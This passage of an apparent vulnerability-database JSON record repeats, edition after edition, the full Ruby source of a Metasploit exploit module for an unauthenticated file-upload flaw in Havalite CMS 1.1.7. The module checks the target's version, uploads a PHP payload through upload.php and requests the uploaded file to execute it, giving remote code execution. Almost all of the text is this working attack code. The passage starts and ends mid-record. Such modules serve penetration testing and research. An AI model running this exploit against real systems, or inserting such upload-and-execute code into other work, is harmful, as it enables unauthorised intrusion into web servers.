Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-05-15T21:21:24", "differentElements": ["modified", "published"], "edition": 46}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-05-20T19:20:10", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-05-20T19:20:10", "differentElements": ["modified", "published"], "edition": 47}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-05-20T21:20:42", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-05-20T21:20:42", "differentElements": ["modified", "published"], "edition": 48}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-05-28T19:40:50", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-05-28T19:40:50", "differentElements": ["modified", "published"], "edition": 49}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-05-28T21:36:45", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-05-28T21:36:45", "differentElements": ["modified", "published"], "edition": 50}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-06-30T20:32:07", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-06-30T20:32:07", "differentElements": ["modified", "published"], "edition": 51}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-06-30T22:40:27", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-06-30T22:40:27", "differentElements": ["modified", "published"], "edition": 52}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-02T03:11:50", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n 